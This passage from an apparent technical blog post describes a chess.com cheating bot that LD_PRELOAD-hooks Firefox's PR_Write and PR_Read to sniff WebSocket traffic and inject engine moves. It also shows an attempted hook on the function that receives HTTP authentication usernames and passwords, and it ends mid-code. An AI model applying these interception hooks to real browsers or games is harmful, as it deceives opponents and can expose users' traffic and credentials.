knowledge about the protocol that we need. Now let's discuss how I
finally implemented my bot.</p>
<h3 id="chap_workings">How the bot is implemented</h3>
<p>As discussed, I chose to hook into low-level networking functions in the
browser. I chose Firefox as my hooking target, because there are already
quite a few examples of how to hook networking functions in
Firefox.</p>
<p>The technique is known as the LD_PRELOAD trick. You can
learn about it in this short <a href="http://stackoverflow.com/questions/426230/what-is-the-ld-preload-trick">stackoverflow.com
explanation</a>.</p>
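<p>For readers who have never seen the trick, here is a minimal sketch that wraps libc's <code>write()</code>. It is only an illustration of the mechanism, not the bot's code: the counter <code>hooked_write_calls</code> is a name I made up, and the sketch assumes Linux with glibc and g++ (which defines <code>_GNU_SOURCE</code> by default, so <code>RTLD_NEXT</code> is available).</p>

```cpp
#include <dlfcn.h>   // dlsym, RTLD_NEXT
#include <unistd.h>  // ssize_t and the declaration of write()
#include <cstddef>

// Illustrative counter (hypothetical name): how often the wrapper ran.
static unsigned long hooked_write_calls = 0;

// Same name and signature as libc's write(). When this library is preloaded,
// the dynamic linker resolves calls to write() to this definition first.
extern "C" ssize_t write(int fd, const void *buf, size_t count) {
    using write_fn = ssize_t (*)(int, const void *, size_t);
    static write_fn real_write = nullptr;

    if (real_write == nullptr) {
        // RTLD_NEXT asks for the next definition of the symbol in the
        // library search order, which is the original libc function.
        real_write = reinterpret_cast<write_fn>(dlsym(RTLD_NEXT, "write"));
        if (real_write == nullptr) return -1;
    }

    ++hooked_write_calls;                // inspect or log buf here
    return real_write(fd, buf, count);   // forward to the original
}
```

<p>Built as a shared library (for example with <code>g++ -shared -fPIC hook.cpp -o hook.so -ldl</code>) and started with <code>LD_PRELOAD=./hook.so some_program</code>, every call the program makes to <code>write()</code> through the dynamic linker passes through the wrapper first.</p>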
<p>There are other, better ways to hook library functions. I really
recommend that you read <a href="http://www.codeproject.com/Articles/70302/Redirecting-functions-in-shared-ELF-libraries">this wonderful
article</a>
about <em>redirecting shared functions in ELF binaries</em>. You should,
however, have solid knowledge of the <em>ELF</em> format in order to follow it.</p>
<p>First, I tried to hook directly into the specific HTTP and WebSocket
functions in the Firefox network library called <em>netwerk</em> or
<a href="https://developer.mozilla.org/en/docs/Necko">necko</a>. But Firefox is
written in C++, and therefore it's not so simple to use the LD_PRELOAD
trick, because the function and class names are
<a href="http://en.wikipedia.org/wiki/Name_mangling#Standardised_name_mangling_in_C.2B.2B">mangled</a>.
I desperately tried to hook such C++ code, and I also managed to do so in
a simple example. It looks something like the code below, but it never
actually logged any calls, maybe because the function was never called.
Here I try to hook into the <code>GenerateCredentials()</code> function of the
<code>nsHttpBasicAuth</code> class. I assume the function fires when you enter
HTTP authentication credentials in the browser.</p>
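<div class="highlight"><pre><span></span><code><span class="c1">// _GNU_SOURCE must be defined before the includes so that dlfcn.h exposes RTLD_NEXT</span>
<span class="cp">#ifndef _GNU_SOURCE</span>
<span class="cp">#define _GNU_SOURCE</span>
<span class="cp">#endif</span>
<span class="cp">#include &lt;stdio.h&gt;</span>
<span class="cp">#include &lt;stdlib.h&gt;</span>
<span class="cp">#include &lt;string.h&gt;</span>
<span class="cp">#include &lt;dlfcn.h&gt;</span>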
<span class="n">namespace</span><span class="w"> </span><span class="n">mozilla</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="n">namespace</span><span class="w"> </span><span class="n">net</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="k">typedef</span><span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">short</span><span class="w"> </span><span class="n">char16_t</span><span class="p">;</span><span class="w"></span>
<span class="k">typedef</span><span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="kt">uint32_t</span><span class="p">;</span><span class="w"></span>
<span class="k">typedef</span><span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">long</span><span class="w"> </span><span class="n">PRUint32</span><span class="p">;</span><span class="w"> </span>
<span class="k">typedef</span><span class="w"> </span><span class="n">PRUint32</span><span class="w"> </span><span class="n">nsresult</span><span class="p">;</span><span class="w"></span>
<span class="cp">#define NS_IMETHODIMP NS_IMETHODIMP_(nsresult)</span>
<span class="n">class</span><span class="w"> </span><span class="n">nsIHttpAuthenticator</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="p">};</span><span class="w"></span>
<span class="n">class</span><span class="w"> </span><span class="n">nsISupports</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="p">};</span><span class="w"></span>
<span class="n">class</span><span class="w"> </span><span class="n">nsHttpBasicAuth</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="n">public</span><span class="w"> </span><span class="n">nsIHttpAuthenticator</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="n">public</span><span class="o">:</span><span class="w"></span>
<span class="w"> </span><span class="n">nsHttpBasicAuth</span><span class="p">();</span><span class="w"></span>
<span class="w"> </span><span class="n">virtual</span><span class="w"> </span><span class="o">~</span><span class="n">nsHttpBasicAuth</span><span class="p">();</span><span class="w"></span>
<span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">long</span><span class="w"> </span><span class="nf">GenerateCredentials</span><span class="p">(</span><span class="kt">void</span><span class="w"> </span><span class="o">*</span><span class="n">authChannel</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">challenge</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="kt">bool</span><span class="w"> </span><span class="n">isProxyAuth</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="n">char16_t</span><span class="w"> </span><span class="o">*</span><span class="n">domain</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="n">char16_t</span><span class="w"> </span><span class="o">*</span><span class="n">user</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="n">char16_t</span><span class="w"> </span><span class="o">*</span><span class="n">password</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">nsISupports</span><span class="w"> </span><span class="o">**</span><span class="n">sessionState</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">nsISupports</span><span class="w"> </span><span class="o">**</span><span class="n">continuationState</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="kt">uint32_t</span><span class="w"> </span><span class="o">*</span><span class="n">aFlags</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">**</span><span class="n">creds</span><span class="p">);</span><span class="w"></span>
<span class="p">};</span><span class="w"></span>
<span class="n">nsHttpBasicAuth</span><span class="o">::</span><span class="n">nsHttpBasicAuth</span><span class="p">()</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="n">nsHttpBasicAuth</span><span class="o">::~</span><span class="n">nsHttpBasicAuth</span><span class="p">()</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="kt">unsigned</span><span class="w"> </span><span class="kt">long</span><span class="w"></span>
<span class="n">nsHttpBasicAuth</span><span class="o">::</span><span class="n">GenerateCredentials</span><span class="p">(</span><span class="kt">void</span><span class="w"> </span><span class="o">*</span><span class="n">authChannel</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">challenge</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="kt">bool</span><span class="w"> </span><span class="n">isProxyAuth</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="n">char16_t</span><span class="w"> </span><span class="o">*</span><span class="n">domain</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="n">char16_t</span><span class="w"> </span><span class="o">*</span><span class="n">user</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="n">char16_t</span><span class="w"> </span><span class="o">*</span><span class="n">password</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">nsISupports</span><span class="w"> </span><span class="o">**</span><span class="n">sessionState</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">nsISupports</span><span class="w"> </span><span class="o">**</span><span class="n">continuationState</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="kt">uint32_t</span><span class="w"> </span><span class="o">*</span><span class="n">aFlags</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">**</span><span class="n">creds</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stdout</span><span class="p">,</span><span class="w"> </span><span class="s">"[+] GenerateCredentials hooked!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="c1">// define the class member pointer type</span>
<span class="w"> </span><span class="k">typedef</span><span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="nf">long</span><span class="w"> </span><span class="p">(</span><span class="n">nsHttpBasicAuth</span><span class="o">::*</span><span class="n">hookedMethod</span><span class="p">)(</span><span class="kt">void</span><span class="w"> </span><span class="o">*</span><span class="p">,</span><span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="p">,</span><span class="w"> </span><span class="kt">bool</span><span class="p">,</span><span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="n">char16_t</span><span class="w"> </span><span class="o">*</span><span class="p">,</span><span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="n">char16_t</span><span class="w"> </span><span class="o">*</span><span class="p">,</span><span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="n">char16_t</span><span class="w"> </span><span class="o">*</span><span class="p">,</span><span class="w"> </span><span class="n">nsISupports</span><span class="w"> </span><span class="o">**</span><span class="p">,</span><span class="w"> </span><span class="n">nsISupports</span><span class="w"> </span><span class="o">**</span><span class="p">,</span><span class="w"> </span><span class="kt">uint32_t</span><span class="w"> </span><span class="o">*</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">**</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">static</span><span class="w"> </span><span class="n">hookedMethod</span><span class="w"> </span><span class="n">origMethod</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">void</span><span class="w"> </span><span class="o">*</span><span class="n">tmpPtr</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">dlsym</span><span class="p">(</span><span class="n">RTLD_NEXT</span><span class="p">,</span><span class="w"> </span><span class="s">"_ZN7mozilla3net15nsHttpBasicAuth19GenerateCredentialsEPvPKcbPKtS6_S6_PPNS0_11nsISupportsES9_PjPPc"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">tmpPtr</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"dlsym() couldn't locate the symbol :( </span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">origMethod</span><span class="p">,</span><span class="w"> </span><span class="o">&</span><span class="n">tmpPtr</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">tmpPtr</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="c1">// call the original method</span>
<span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">long</span><span class="w"> </span><span class="n">retVal</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">this</span><span class="o">->*</span><span class="n">origMethod</span><span class="p">)(</span><span class="n">authChannel</span><span class="p">,</span><span class="w"> </span><span class="n">challenge</span><span class="p">,</span><span class="w"> </span><span class="n">isProxyAuth</span><span class="p">,</span><span class="w"> </span><span class="n">domain</span><span class="p">,</span><span class="w"> </span><span class="n">user</span><span class="p">,</span><span class="w"> </span><span class="n">password</span><span class="p">,</span><span class="w"> </span><span class="n">sessionState</span><span class="p">,</span><span class="w"> </span><span class="n">continuationState</span><span class="p">,</span><span class="w"> </span><span class="n">aFlags</span><span class="p">,</span><span class="w"> </span><span class="n">creds</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">retVal</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
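<p>A quick sanity check for this kind of hook is to demangle the symbol name that is passed to <code>dlsym()</code> and compare it with the declaration you are trying to replace. The sketch below uses <code>abi::__cxa_demangle</code> from <code>&lt;cxxabi.h&gt;</code> (available with GCC and Clang); the wrapper name <code>demangle</code> is my own.</p>

```cpp
#include <cxxabi.h>  // abi::__cxa_demangle (GCC / Clang, Itanium C++ ABI)
#include <cstdlib>   // std::free
#include <string>

// Hypothetical wrapper: demangle an Itanium C++ ABI symbol name.
// Returns an empty string if the name cannot be demangled.
std::string demangle(const char *mangled) {
    int status = 0;
    // With a null output buffer the function allocates the result with
    // malloc(), so the caller has to release it with free().
    char *out = abi::__cxa_demangle(mangled, nullptr, nullptr, &status);
    if (status != 0 || out == nullptr) return "";
    std::string result(out);
    std::free(out);
    return result;
}
```

<p>Applied to the symbol used above, the demangled signature starts with <code>mozilla::net::nsHttpBasicAuth::GenerateCredentials(</code> and lists the <code>char16_t</code> parameters as <code>unsigned short const*</code> and the state parameters as <code>mozilla::net::nsISupports**</code>, because that is how the stub declarations in the hook define them. If the real library declares these types differently, the mangled names will not match and the hook is never reached, which may be one reason why nothing was logged.</p>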
<p>Anyway, if I could succeed in hooking C++ functions by overcoming
the mangling issues, I would directly hook into functions found in the
Mozilla source tree
<a href="http://mxr.mozilla.org/mozilla-central/source/netwerk/protocol/websocket/">/mozilla-central/source/netwerk/protocol/websocket/</a>.
It would be enormously juicy to hook into the file
<a href="http://mxr.mozilla.org/mozilla-central/source/netwerk/protocol/websocket/WebSocketChannel.cpp">WebSocketChannel.cpp</a>.
For example, the function <code>void WebSocketChannel::BeginOpen()</code> on line
1061 looks like a nice start. <strong>Can anyone provide me a hooking example
for this function? That'd be awesome!</strong></p>
<p>So after some further research and giving up on hooking C++
functions, I decided to hook into Firefox's <code>PR_Write()</code> and
<code>PR_Read()</code> low-level networking functions, implemented in plain C. If
you search for these functions on the internet, you will find lots of
examples of form grabbers, a technique that is commonly used
by malware writers.</p>
<p>After experimenting a little with these two functions, I figured out
that basically the whole freaking internet flows through them. For
instance, if you just open the browser without loading any site, a whole
bunch of meta protocols is squeezed through <code>PR_Write()</code> and
<code>PR_Read()</code>.</p>
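<p>Because so much unrelated traffic passes through these two functions, a hook has to filter the buffers by content. The buffers are raw byte ranges and not NUL-terminated strings, so <code>strstr()</code> is not safe to use on them. Here is a minimal sketch of a length-bounded search; the name <code>buffer_contains</code> is hypothetical and this is not necessarily how the helper in my repository is written.</p>

```cpp
#include <algorithm>  // std::search
#include <cstddef>
#include <cstring>    // std::strlen

// Hypothetical helper: true if the first `len` bytes of `buf` contain the
// NUL-terminated string `needle`. Never reads past buf + len.
bool buffer_contains(const void *buf, std::size_t len, const char *needle) {
    const char *first = static_cast<const char *>(buf);
    const char *last = first + len;
    const std::size_t needle_len = std::strlen(needle);

    if (needle_len == 0) return true;  // an empty needle always matches
    return std::search(first, last, needle, needle + needle_len) != last;
}
```

<p>Inside a write hook, a call such as <code>buffer_contains(buf, amount, "Upgrade: websocket")</code> would then pick out the WebSocket handshake request from everything else that is written.</p>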
<p>I assume that all possible protocols (like accessing cookies,
<em>about:blank</em>, <em>file:</em> and the like) are also handled by these functions.
It's really funny what you're able to see when you hook into these
functions. To put it concisely: stuff that you thought was
deleted after clearing the cache happily shows up inside these two
functions...</p>
<p>Anyway, the basic C code that implements this hooking technique in the form
of a shared library looks like the excerpt below. You can always
visit <a href="https://github.com/NikolaiT/chess-com-cheat">my public
repository</a>, where you can
read the current state of the cheat code.</p>
<div class="highlight"><pre><span></span><code><span class="n">PRInt32</span><span class="w"> </span><span class="nf">PR_Write</span><span class="p">(</span><span class="n">PRFileDesc</span><span class="w"> </span><span class="o">*</span><span class="n">fd</span><span class="p">,</span><span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="kt">void</span><span class="w"> </span><span class="o">*</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">PRInt32</span><span class="w"> </span><span class="n">amount</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">static</span><span class="w"> </span><span class="n">PRInt32</span><span class="w"> </span><span class="p">(</span><span class="o">*</span><span class="n">my_PR_write</span><span class="p">)(</span><span class="n">PRFileDesc</span><span class="w"> </span><span class="o">*</span><span class="p">,</span><span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="kt">void</span><span class="w"> </span><span class="o">*</span><span class="p">,</span><span class="w"> </span><span class="n">PRInt32</span><span class="p">)</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="c1">// Detect the client WebSocket connection attempt</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">webSocketState</span><span class="p">.</span><span class="n">state</span><span class="w"> </span><span class="o">&</span><span class="w"> </span><span class="n">WEB_SOCKET_CONNECTION_REQUESTED</span><span class="p">)</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="n">amount</span><span class="w"> </span><span class="o">></span><span class="w"> </span><span class="mi">600</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="n">amount</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="mi">1200</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="n">memContains</span><span class="p">((</span><span class="k">const</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">amount</span><span class="p">,</span><span class="w"> </span><span class="s">"Upgrade: websocket"</span><span class="p">)</span><span class="w"> </span>
<span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="n">memContains</span><span class="p">((</span><span class="k">const</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">amount</span><span class="p">,</span><span class="w"> </span><span class="s">"Origin: http://live.chess.com"</span><span class="p">)</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="n">memContains</span><span class="p">((</span><span class="k">const</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">amount</span><span class="p">,</span><span class="w"> </span><span class="s">"Sec-WebSocket-Key:"</span><span class="p">)</span><span class="w"> </span><span class="o">&&</span><span class="w"></span>
<span class="w"> </span><span class="n">memContains</span><span class="p">((</span><span class="k">const</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">amount</span><span class="p">,</span><span class="w"> </span><span class="s">"Sec-WebSocket-Version: 13"</span><span class="p">))</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">webSocketState</span><span class="p">.</span><span class="n">state</span><span class="w"> </span><span class="o">|=</span><span class="w"> </span><span class="n">WEB_SOCKET_CONNECTION_REQUESTED</span><span class="p">;</span><span class="w"> </span>
<span class="cp">#if DEBUG_LEVEL >= 1</span>
<span class="w"> </span><span class="n">INFO_PRINT</span><span class="p">(</span><span class="s">"Chess.com WebSocket client request detected"</span><span class="p">,</span><span class="w"> </span><span class="n">SH_RED</span><span class="p">);</span><span class="w"></span>
<span class="cp">#endif</span>
<span class="w"> </span><span class="c1">// Also start up the Stockfish engine</span>
<span class="w"> </span><span class="c1">//INFO_PRINT("Starting the engine...", SH_BLUE);</span>
<span class="w"> </span><span class="c1">//initStockfish();</span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="cm">/*</span>
<span class="cm"> * When the WebSocket is open, sniff for move packets of roughly 230 to 240 bytes (the check below allows 210 to 260).</span>
<span class="cm"> * I observed that these coincide with moves made, hence I assume these packets transmit moves.</span>
<span class="cm"> * Now I just need to decrypt them and all is good.</span>
<span class="cm"> */</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">((</span><span class="n">webSocketState</span><span class="p">.</span><span class="n">state</span><span class="w"> </span><span class="o">&</span><span class="w"> </span><span class="n">WEB_SOCKET_CONNECTION_REQUESTED</span><span class="p">)</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="n">amount</span><span class="w"> </span><span class="o">></span><span class="w"> </span><span class="mi">210</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="n">amount</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="mi">260</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="cp">#if DEBUG_LEVEL >= 2</span>
<span class="w"> </span><span class="n">INFO_PRINT</span><span class="p">(</span><span class="s">"PR_Write() called and buffer size suggests that this packet represents a move!"</span><span class="p">,</span><span class="w"> </span><span class="n">SH_RED</span><span class="p">);</span><span class="w"></span>
<span class="cp">#endif</span>
<span class="w"> </span><span class="c1">// Inject an engine-made move and update the game state</span>
<span class="w"> </span><span class="n">modifyMove</span><span class="p">((</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="p">(</span><span class="kt">size_t</span><span class="p">)</span><span class="n">amount</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">my_PR_write</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">dlsym</span><span class="p">(</span><span class="n">RTLD_NEXT</span><span class="p">,</span><span class="w"> </span><span class="s">"PR_Write"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">my_PR_write</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"dlsym() failed for PR_Write</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">PRInt32</span><span class="w"> </span><span class="n">retVal</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="o">*</span><span class="n">my_PR_write</span><span class="p">)(</span><span class="n">fd</span><span class="p">,</span><span class="w"> </span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">amount</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">retVal</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="n">PRInt32</span><span class="w"> </span><span class="nf">PR_Read</span><span class="p">(</span><span class="n">PRFileDesc</span><span class="w"> </span><span class="o">*</span><span class="n">fd</span><span class="p">,</span><span class="w"> </span><span class="kt">void</span><span class="w"> </span><span class="o">*</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">PRInt32</span><span class="w"> </span><span class="n">amount</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">static</span><span class="w"> </span><span class="n">PRInt32</span><span class="w"> </span><span class="p">(</span><span class="o">*</span><span class="n">my_PR_read</span><span class="p">)(</span><span class="n">PRFileDesc</span><span class="w"> </span><span class="o">*</span><span class="p">,</span><span class="w"> </span><span class="kt">void</span><span class="w"> </span><span class="o">*</span><span class="p">,</span><span class="w"> </span><span class="n">PRInt32</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* </span>
<span class="cm"> * There is a hell of a lot of data that passes through this function. Hence we want</span>
<span class="cm"> * to consume as little processing power as possible. We are only interested in data that</span>
<span class="cm"> * is in a specific length range, since it seems that the WebSocket packets on live.chess.com</span>
<span class="cm"> * have a pretty regular size.</span>
<span class="cm"> */</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* </span>
<span class="cm"> * Sniff for incoming live.chess.com WebSocket move data.</span>
<span class="cm"> */</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">((</span><span class="n">webSocketState</span><span class="p">.</span><span class="n">state</span><span class="w"> </span><span class="o">&</span><span class="w"> </span><span class="n">WEB_SOCKET_CONNECTION_REQUESTED</span><span class="p">)</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="n">amount</span><span class="w"> </span><span class="o">></span><span class="w"> </span><span class="mi">50</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="n">memContains</span><span class="p">((</span><span class="k">const</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">amount</span><span class="p">,</span><span class="w"> </span><span class="s">"moves"</span><span class="p">)</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">couldRead</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">collectGameState</span><span class="p">((</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">amount</span><span class="p">);</span><span class="w"></span>
<span class="cp">#if DEBUG_LEVEL >= 2</span>
<span class="w"> </span><span class="n">INFO_PRINT</span><span class="p">(</span><span class="s">"PR_Read() called with 'moves' keyword inside"</span><span class="p">,</span><span class="w"> </span><span class="n">SH_BLUE</span><span class="p">);</span><span class="w"></span>
<span class="cp">#endif</span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">my_PR_read</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">dlsym</span><span class="p">(</span><span class="n">RTLD_NEXT</span><span class="p">,</span><span class="w"> </span><span class="s">"PR_Read"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">my_PR_read</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"dlsym() failed for PR_Read</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">PRInt32</span><span class="w"> </span><span class="n">retVal</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="o">*</span><span class="n">my_PR_read</span><span class="p">)(</span><span class="n">fd</span><span class="p">,</span><span class="w"> </span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">amount</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">retVal</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
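<p>The helper <code>memContains()</code> is used above but not shown in the excerpt. The following is only a minimal sketch of what such a helper could look like, assuming it does a bounded substring search (the buffers handed to <code>PR_Write()</code> and <code>PR_Read()</code> are not NUL-terminated) and returns a pointer to the first match or <code>NULL</code>. The names <code>mem_contains_sketch</code> and <code>looks_like_ws_handshake_sketch</code> are made up for illustration and are not taken from the repository. The second function mirrors the handshake condition from <code>PR_Write()</code>, with the cheap size check first so that most traffic is rejected without any searching.</p>

```c
#include <stddef.h>
#include <string.h>

/*
 * Hypothetical stand-in for memContains(): look for the NUL-terminated
 * needle inside the first haystack_len bytes of haystack. The haystack
 * itself does not need to be NUL-terminated.
 */
const char *mem_contains_sketch(const char *haystack, size_t haystack_len,
                                const char *needle)
{
    size_t needle_len = strlen(needle);

    if (haystack == NULL || needle_len == 0 || haystack_len < needle_len)
        return NULL;

    for (size_t i = 0; i + needle_len <= haystack_len; i++) {
        if (memcmp(haystack + i, needle, needle_len) == 0)
            return haystack + i;
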